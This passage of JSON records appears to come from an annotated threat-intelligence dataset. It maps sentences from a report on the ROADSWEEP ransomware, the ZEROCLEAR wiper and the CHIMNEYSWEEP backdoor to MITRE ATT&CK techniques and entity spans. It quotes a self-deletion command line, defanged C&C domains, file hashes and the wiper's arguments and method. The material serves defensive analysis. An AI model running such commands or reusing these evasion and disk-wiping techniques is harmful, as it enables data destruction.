instead ROADSWEEP will create a new command prompt (cmd.exe), then send these commands to the process with a pipe.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "ROADSWEEP executes embedded scripts via cmd.exe pipes without disk writing", "entities": [ { "text": "ROADSWEEP", "start": 49, "end": 58, "label": "MalwareTool" }, { "text": "create a new command prompt (cmd.exe)", "start": 64, "end": 101, "label": "Action" }, { "text": "end these commands to the process with a pipe.", "start": 109, "end": 155, "label": "Action" }, { "text": "scripts are never written to disk", "start": 6, "end": 39, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s42-f85402", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "These scripts are never written to disk, instead ROADSWEEP will create a new command prompt (cmd.exe), then send these commands to the process with a pipe.", "sentence_text": "The scripts are embedded within the binary as RC4 encrypted blocks and are decrypted at runtime by the payload.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "ROADSWEEP decrypts RC4-embedded scripts at runtime for execution", "entities": [ { "text": "decrypted at runtime", "start": 75, "end": 95, "label": "Action" }, { "text": "RC4 encrypted blocks", "start": 46, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "embedded within the binary", "start": 16, "end": 42, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s43-37fe7b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "The scripts are embedded within the binary as RC4 encrypted blocks and are decrypted at runtime by the payload.", "sentence_text": "The first script decrypted by ROADSWEEP is responsible for disabling settings like SystemRestore and Volume Shadow Copies, along with disabling critical services and processes.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1490", "name": "Inhibit System Recovery" } ], "procedure": "ROADSWEEP script disables SystemRestore, Volume Shadow Copies, and critical services", "entities": [ { "text": "ROADSWEEP", "start": 30, "end": 39, "label": "MalwareTool" }, { "text": "disabling settings like SystemRestore and Volume Shadow Copies, along with disabling critical services and processes", "start": 59, "end": 175, "label": "Action" }, { "text": "first script decrypted", "start": 4, "end": 26, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s44-130e6d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "The first script decrypted by ROADSWEEP is responsible for disabling settings like SystemRestore and Volume Shadow Copies, along with disabling critical services and processes.", "sentence_text": "ROADSWEEP also decrypts the following script, which is used to delete itself after execution:\nping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "ROADSWEEP decrypts self-deletion script with ping delay and file deletion", "entities": [ { "text": "ROADSWEEP", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "delete itself after execution:", "start": 63, "end": 93, "label": "Action" }, { "text": "ping 1.1.1.1 -n 1 -w 3000 > Nul", "start": 94, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "Del /f /q", "start": 128, "end": 137, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s45-5a5294", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "ROADSWEEP also decrypts the following script, which is used to delete itself after execution:\nping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q", "sentence_text": "\"%s\" Next, ROADSWEEP extracts configuration values that are RC4 encrypted and embedded within the binary itself.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "ROADSWEEP extracts RC4-embedded configuration values from binary", "entities": [ { "text": "ROADSWEEP", "start": 11, "end": 20, "label": "MalwareTool" }, { "text": "extracts configuration values", "start": 21, "end": 50, "label": "Action" }, { "text": "RC4 encrypted", "start": 60, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "embedded within the binary", "start": 78, "end": 104, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s46-26a730", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "\"%s\" Next, ROADSWEEP extracts configuration values that are RC4 encrypted and embedded within the binary itself.", "sentence_text": "The first is a list of extensions that should be avoided when the encryption occurs:\n.exe", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP avoids encrypting .exe files based on extension exclusion list", "entities": [ { "text": "extensions that should be avoided when the encryption occurs:", "start": 23, "end": 84, "label": "Action" }, { "text": ".exe", "start": 85, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s48-c7b3ab", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": ".dll\n.sys", "sentence_text": ".lnk\n.lck\nROADSWEEP also decrypts the filename for the ransomware note, \"How_To_Unlock_MyFiles.txt\" (MD5: 44d1c75815724523a58b566d95378825) and the note itself as shown in Figure 1.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP decrypts ransom note filename and content with specific MD5 hash", "entities": [ { "text": ".lnk", "start": 0, "end": 4, "label": "Infrastructure_Indicator" }, { "text": ".lck", "start": 5, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "How_To_Unlock_MyFiles.txt", "start": 73, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "MD5: 44d1c75815724523a58b566d95378825", "start": 101, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s49-fbb450", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": ".lnk\n.lck\nROADSWEEP also decrypts the filename for the ransomware note, \"How_To_Unlock_MyFiles.txt\" (MD5: 44d1c75815724523a58b566d95378825) and the note itself as shown in Figure 1.", "sentence_text": "After creating the file, the encryption key that is used to encrypt each file is computed.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP computes encryption key for file encryption after ransom note creation", "entities": [ { "text": "encrypt each file is computed", "start": 60, "end": 89, "label": "Action" }, { "text": "the encryption key that is used to ", "start": 25, "end": 60, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s50-c81992", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "After creating the file, the encryption key that is used to encrypt each file is computed.", "sentence_text": "The key is derived through producing a random data stream using the algorithm shown in Figure 6, then hashing this value with MD5 and using this as an RC4 key.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP derives RC4 key from random data stream using MD5 hashing", "entities": [ { "text": "key is derived through producing a random data stream", "start": 4, "end": 57, "label": "Action" }, { "text": "hashing this value with MD5", "start": 102, "end": 129, "label": "Action" }, { "text": "using this as an RC4 key", "start": 134, "end": 158, "label": "Action" }, { "text": " MD5", "start": 125, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "RC4 key", "start": 151, "end": 158, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s51-143647", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "The key is derived through producing a random data stream using the algorithm shown in Figure 6, then hashing this value with MD5 and using this as an RC4 key.", "sentence_text": "ROADSWEEP then encrypts this key with an embedded RSA public key and proceeds to format the ransomware message by appending the Base64 encoded and encrypted “recovery key” to the message itself.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP encrypts key with embedded RSA public key and formats ransom message with Base64 recovery key", "entities": [ { "text": "ROADSWEEP", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "encrypts this key with an embedded RSA public key", "start": 15, "end": 64, "label": "Action" }, { "text": "format the ransomware message", "start": 81, "end": 110, "label": "Action" }, { "text": "appending the Base64 encoded and encrypted “recovery key”", "start": 114, "end": 171, "label": "Action" }, { "text": "RSA public key", "start": 50, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "Base64 encoded", "start": 128, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s52-34cafe", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "ROADSWEEP then encrypts this key with an embedded RSA public key and proceeds to format the ransomware message by appending the Base64 encoded and encrypted “recovery key” to the message itself.", "sentence_text": "The Base64 encoding uses a custom alphabet of \"wxyz0123456789.-JKLMNOPghijklmnopqrstuvQRSTUVWXYZabcdefABCDEFGHI\".", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "ROADSWEEP uses custom Base64 alphabet for recovery key encoding", "entities": [ { "text": "custom alphabet of \"wxyz0123456789.-JKLMNOPghijklmnopqrstuvQRSTUVWXYZabcdefABCDEFGHI\".", "start": 27, "end": 113, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s53-8e6770", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "The Base64 encoding uses a custom alphabet of \"wxyz0123456789.-JKLMNOPghijklmnopqrstuvQRSTUVWXYZabcdefABCDEFGHI\".", "sentence_text": "This thread enumerates the file system using the Windows FindFirstFileW and FindNextFileW APIs.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "ROADSWEEP enumerates file system using FindFirstFileW and FindNextFileW APIs", "entities": [ { "text": "FindFirstFileW", "start": 57, "end": 71, "label": "Infrastructure_Indicator" }, { "text": " FindNextFileW", "start": 75, "end": 89, "label": "Infrastructure_Indicator" }, { "text": " enumerates the file system", "start": 11, "end": 38, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s54-7ff163", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "This thread enumerates the file system using the Windows FindFirstFileW and FindNextFileW APIs.", "sentence_text": "For each root directory, a ransomware note is created with the content and filename noted above.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP creates ransom note in each root directory with specified content and filename", "entities": [ { "text": "For each root directory, a ransomware note is created ", "start": 0, "end": 54, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s55-86a6bc", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "For each root directory, a ransomware note is created with the content and filename noted above.", "sentence_text": "The encryption process takes place by renaming the file with the “.lck” extension.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP encrypts files by renaming with .lck extension", "entities": [ { "text": "encryption process takes place", "start": 4, "end": 34, "label": "Action" }, { "text": "renaming the file with the “.lck” extension", "start": 38, "end": 81, "label": "Action" }, { "text": "“.lck” extension", "start": 65, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s56-efaae9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "The encryption process takes place by renaming the file with the “.lck” extension.", "sentence_text": "These values are then used after the wipe to preserve the file times, although the purpose of this is currently unknown.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s57-d8e94a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "These values are then used after the wipe to preserve the file times, although the purpose of this is currently unknown.", "sentence_text": "ROADSWEEP will then open the file and compute the size using the GetFileSize API.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ROADSWEEP opens files and computes size using GetFileSize API", "entities": [ { "text": "ROADSWEEP", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "open the file", "start": 20, "end": 33, "label": "Action" }, { "text": "compute the size using the GetFileSize API", "start": 38, "end": 80, "label": "Action" }, { "text": "GetFileSize API", "start": 65, "end": 80, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s58-9ff229", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "ROADSWEEP will then open the file and compute the size using the GetFileSize API.", "sentence_text": "This is completed until the entire file is overwritten.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s59-7e0f2d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "This is completed until the entire file is overwritten.", "sentence_text": "Following this, the aforementioned self-delete script is executed and the process exits.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "ROADSWEEP executes self-delete script and exits process after file operations", "entities": [ { "text": "process exits", "start": 74, "end": 87, "label": "Action" }, { "text": "script is executed ", "start": 47, "end": 66, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s60-476934", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "Following this, the aforementioned self-delete script is executed and the process exits.", "sentence_text": "Technical Annex B:\nZEROCLEAR\nVariant", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s61-2405c9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "Technical Annex B:\nZEROCLEAR\nVariant", "sentence_text": "We identified a ZEROCLEAR payload which takes in command line arguments from the operator and results in corruption of the file system using the RawDisk driver.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "ZEROCLEAR payload corrupts filesystem using RawDisk driver via command line arguments", "entities": [ { "text": "ZEROCLEAR payload", "start": 16, "end": 33, "label": "MalwareTool" }, { "text": "corruption of the file system", "start": 105, "end": 134, "label": "Action" }, { "text": " takes in command line arguments from the operator", "start": 39, "end": 89, "label": "Action" }, { "text": "RawDisk driver.", "start": 145, "end": 160, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s62-d74b4a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "We identified a ZEROCLEAR payload which takes in command line arguments from the operator and results in corruption of the file system using the RawDisk driver.", "sentence_text": "cl.exe (MD5: 7b71764236f244ae971742ee1bc6b098)\nZEROCLEAR disruptive payload Compiled on 2022/07/15 13:26:28", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "ZEROCLEAR payload with specific MD5 hash and compilation timestamp", "entities": [ { "text": "ZEROCLEAR disruptive payload ", "start": 47, "end": 76, "label": "MalwareTool" }, { "text": "cl.exe", "start": 0, "end": 6, "label": "Infrastructure_Indicator" }, { "text": "MD5: 7b71764236f244ae971742ee1bc6b098", "start": 8, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "Compiled on 2022/07/15 13:26:28", "start": 76, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s63-ca678d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "cl.exe (MD5: 7b71764236f244ae971742ee1bc6b098)\nZEROCLEAR disruptive payload Compiled on 2022/07/15 13:26:28", "sentence_text": "The first command line argument must be one of the following:\n\"wp\" (default) –", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "ZEROCLEAR requires specific command line arguments including 'wp' (default)", "entities": [ { "text": "command line argument must be one of the following:\n\"wp\" (default) –", "start": 10, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s64-c49872", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "The first command line argument must be one of the following:\n\"wp\" (default) –", "sentence_text": "Wipes the disk using the ElDos driver, this expects the driver to be running for the wiper activity to occur.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "ZEROCLEAR wipes disk using ElDos driver requiring driver to be running", "entities": [ { "text": "Wipes the disk", "start": 0, "end": 14, "label": "Action" }, { "text": "expects the driver to be running", "start": 44, "end": 76, "label": "Action" }, { "text": "ElDos driver", "start": 25, "end": 37, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s65-5cae0b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Wipes the disk using the ElDos driver, this expects the driver to be running for the wiper activity to occur.", "sentence_text": "\"in\" – Installs and starts the driver named rwdsk.sys, which is expected to be located in the same directory as ZEROCLEAR.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "ZEROCLEAR installs and starts rwdsk.sys driver from current directory", "entities": [ { "text": "ZEROCLEAR.", "start": 112, "end": 122, "label": "MalwareTool" }, { "text": "nstalls and starts the driver", "start": 8, "end": 37, "label": "Action" }, { "text": "rwdsk.sys", "start": 44, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "located in the same directory", "start": 79, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s66-9bca30", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "\"in\" – Installs and starts the driver named rwdsk.sys, which is expected to be located in the same directory as ZEROCLEAR.", "sentence_text": "“un” – Uninstalls the driver named rwdsk and deletes the file on disk.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "ZEROCLEAR uninstalls rwdsk driver and deletes file from disk", "entities": [ { "text": "Uninstalls the driver", "start": 7, "end": 28, "label": "Action" }, { "text": "deletes the file on disk", "start": 45, "end": 69, "label": "Action" }, { "text": "rwdsk", "start": 35, "end": 40, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s67-5d0220", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "“un” – Uninstalls the driver named rwdsk and deletes the file on disk.", "sentence_text": "ZEROCLEAR then opens a handle to the RawDisk driver by opening a handle to the following:\n\"\\\\?\\RawDisk3#B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D\"\nIt then computes the disk size using the Windows IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, IOCTL_DISK_GET_DRIVE_GEOMETRY and IOCTL_DISK_GET_LENGTH_INFO DeviceIoControl calls.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "ZEROCLEAR opens RawDisk handle and computes disk size using DeviceIoControl calls", "entities": [ { "text": " opens a handle to the RawDisk driver ", "start": 14, "end": 52, "label": "Action" }, { "text": "computes the disk size ", "start": 190, "end": 213, "label": "Action" }, { "text": "\\\\?\\RawDisk3#B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D", "start": 91, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "IOCTL_DISK_GET_DRIVE_GEOMETRY_EX", "start": 231, "end": 263, "label": "Infrastructure_Indicator" }, { "text": "IOCTL_DISK_GET_DRIVE_GEOMETRY", "start": 265, "end": 294, "label": "Infrastructure_Indicator" }, { "text": "IOCTL_DISK_GET_LENGTH_INFO", "start": 299, "end": 325, "label": "Infrastructure_Indicator" }, { "text": "DeviceIoControl calls.", "start": 326, "end": 348, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s68-5cd9ca", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "ZEROCLEAR then opens a handle to the RawDisk driver by opening a handle to the following:\n\"\\\\?\\RawDisk3#B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D\"\nIt then computes the disk size using the Windows IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, IOCTL_DISK_GET_DRIVE_GEOMETRY and IOCTL_DISK_GET_LENGTH_INFO DeviceIoControl calls.", "sentence_text": "The ElDos driver is used to overwrite the data with the value \"0\".", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "ZEROCLEAR uses ElDos driver to overwrite disk data with zeros", "entities": [ { "text": "ElDos driver", "start": 4, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "overwrite the data with the value \"0\"", "start": 28, "end": 65, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s69-c94a65", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "The ElDos driver is used to overwrite the data with the value \"0\".", "sentence_text": "Technical Annex C:\nCHIMNEYSWEEP\nBackdoor\nWhile Mandiant was unable to uncover the infection vector for CHIMNEYSWEEP, we note that the dropper has a valid digital signature.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1553.002", "name": "Code Signing" } ], "procedure": "CHIMNEYSWEEP backdoor deployed via digitally signed dropper with unknown infection vector", "entities": [ { "text": "CHIMNEYSWEEP", "start": 19, "end": 31, "label": "MalwareTool" }, { "text": "Backdoor", "start": 32, "end": 40, "label": "MalwareTool" }, { "text": "valid digital signature.", "start": 148, "end": 172, "label": "Infrastructure_Indicator" }, { "text": "unable to uncover the infection vector", "start": 60, "end": 98, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s70-f0e1a7", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "Technical Annex C:\nCHIMNEYSWEEP\nBackdoor\nWhile Mandiant was unable to uncover the infection vector for CHIMNEYSWEEP, we note that the dropper has a valid digital signature.", "sentence_text": "In addition to dropping the CHIMNEYSWEEP installer, this dropper also contains either an Excel or Word document or an MP4 video file.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "CHIMNEYSWEEP dropper contains decoy Office documents or MP4 video files", "entities": [ { "text": "CHIMNEYSWEEP installer", "start": 28, "end": 50, "label": "MalwareTool" }, { "text": "dropper", "start": 57, "end": 64, "label": "MalwareTool" }, { "text": "Excel or Word document", "start": 89, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "MP4 video file.", "start": 118, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s71-8e5d1a", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "In addition to dropping the CHIMNEYSWEEP installer, this dropper also contains either an Excel or Word document or an MP4 video file.", "sentence_text": "Historically we have seen APT41 also use this signature, although as noted by DUO the password for this certificate was widely available.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s72-8e9895", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "Historically we have seen APT41 also use this signature, although as noted by DUO the password for this certificate was widely available.", "sentence_text": "The threat actor’s choice of signing certificate and dropper is likely based on the fact the legitimate Atheros certificate was used to distribute legitimate drivers using the legitimate dropper.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s73-d0f9d1", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "The threat actor’s choice of signing certificate and dropper is likely based on the fact the legitimate Atheros certificate was used to distribute legitimate drivers using the legitimate dropper.", "sentence_text": "This indicates the threat actors have a high degree of operational security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s74-fa1c8b", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "This indicates the threat actors have a high degree of operational security.", "sentence_text": "Upon execution, the self-extracting tool finds the resource named “Cabinet”, drops it to disk, and then executes a process named unpack.exe.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Self-extracting tool extracts Cabinet resource to unpack.exe and executes it", "entities": [ { "text": "self-extracting tool", "start": 20, "end": 40, "label": "MalwareTool" }, { "text": "finds the resource named “Cabinet”", "start": 41, "end": 75, "label": "Action" }, { "text": "drops it to disk", "start": 77, "end": 93, "label": "Action" }, { "text": "executes a process named unpack.exe.", "start": 104, "end": 140, "label": "Action" }, { "text": "resource named “Cabinet”", "start": 51, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "unpack.exe.", "start": 129, "end": 140, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s75-7dc519", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "Upon execution, the self-extracting tool finds the resource named “Cabinet”, drops it to disk, and then executes a process named unpack.exe.", "sentence_text": "CHIMNEYSWEEP Samples\nUNAVAILABLE (MD5: df9ab47726001883b5fcf58b56b34b41)\nCHIMNEYSWEEP backdoor\nInstalled by unpack.exe (MD5: 8c8bbe3a4a23cd4cc96c12af5fb1199b)\nContained in wextract.exe.mui (MD5: 19068e8228b6b8f5528489fa70779b2b)\nCompile time: 2021/07/26 13:39:17", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "CHIMNEYSWEEP backdoor deployed via unpack.exe with specific MD5 hashes and compile time", "entities": [ { "text": "CHIMNEYSWEEP backdoor", "start": 73, "end": 94, "label": "MalwareTool" }, { "text": "UNAVAILABLE (MD5: df9ab47726001883b5fcf58b56b34b41)", "start": 21, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "unpack.exe (MD5: 8c8bbe3a4a23cd4cc96c12af5fb1199b)", "start": 108, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "wextract.exe.mui (MD5: 19068e8228b6b8f5528489fa70779b2b)", "start": 172, "end": 228, "label": "Infrastructure_Indicator" }, { "text": "Compile time: 2021/07/26 13:39:17", "start": 229, "end": 262, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s76-003d78", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "CHIMNEYSWEEP Samples\nUNAVAILABLE (MD5: df9ab47726001883b5fcf58b56b34b41)\nCHIMNEYSWEEP backdoor\nInstalled by unpack.exe (MD5: 8c8bbe3a4a23cd4cc96c12af5fb1199b)\nContained in wextract.exe.mui (MD5: 19068e8228b6b8f5528489fa70779b2b)\nCompile time: 2021/07/26 13:39:17", "sentence_text": "C&C servers:\ntelegram-update[.]com\navira[.]ltd\nwindowsupadates[.]com\nAppxProviders.dll (MD5: f3c977830bf616b9061d7aee5ce0b2f2)\nCHIMNEYSWEEP backdoor\nCompile time: 2021/07/26 13:39:17", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "CHIMNEYSWEEP backdoor communicates with C&C servers and uses specific DLL with MD5 hash", "entities": [ { "text": "CHIMNEYSWEEP backdoor", "start": 127, "end": 148, "label": "MalwareTool" }, { "text": "telegram-update[.]com", "start": 13, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "avira[.]ltd", "start": 35, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "windowsupadates[.]com", "start": 47, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "AppxProviders.dll (MD5: f3c977830bf616b9061d7aee5ce0b2f2)", "start": 69, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "Compile time: 2021/07/26 13:39:17", "start": 149, "end": 182, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s77-677669", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "C&C servers:\ntelegram-update[.]com\navira[.]ltd\nwindowsupadates[.]com\nAppxProviders.dll (MD5: f3c977830bf616b9061d7aee5ce0b2f2)\nCHIMNEYSWEEP backdoor\nCompile time: 2021/07/26 13:39:17", "sentence_text": "C&C 